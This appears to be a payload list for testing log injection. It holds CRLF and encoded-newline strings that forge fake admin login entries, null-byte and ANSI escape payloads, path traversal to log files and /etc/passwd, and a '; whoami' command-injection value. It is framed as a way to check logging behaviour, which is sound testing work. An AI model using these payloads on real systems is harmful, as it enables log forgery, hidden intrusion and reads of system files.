# Log Injection Payloads # CRLF injection in logs \r\n \r\nUser: admin logged in successfully %0d%0a %0d%0aAuthentication successful for admin # Log poisoning \nuser=admin authenticated=true\n \r\nSUCCESS: Admin login\r\n %0auser:admin%0astatus:success%0a # Log format manipulation admin\nAuthenticated:true test\r\nRole:administrator # Time-based log injection [2023-01-01 00:00:00] User admin logged in successfully [CRITICAL] Unauthorized access detected # Null byte injection in logs admin\x00 user\x00admin # ANSI escape sequences (log injection) \x1b[31mCRITICAL\x1b[0m \033[1;31mALERT\033[0m # Log file path traversal ../../logs/application.log /var/log/auth.log ../../../var/log/syslog # Events to test if they appear in logs # Try these payloads and verify they are logged appropriately: # - Failed login attempts # - Successful login # - Password changes # - Privilege escalation attempts # - Administrative actions # - Access to sensitive data # - Invalid input # - Authentication failures # - Authorization failures # Sample payloads to check logging behavior SELECT * FROM users WHERE username='admin' AND password='wrong' ../../../etc/passwd ; whoami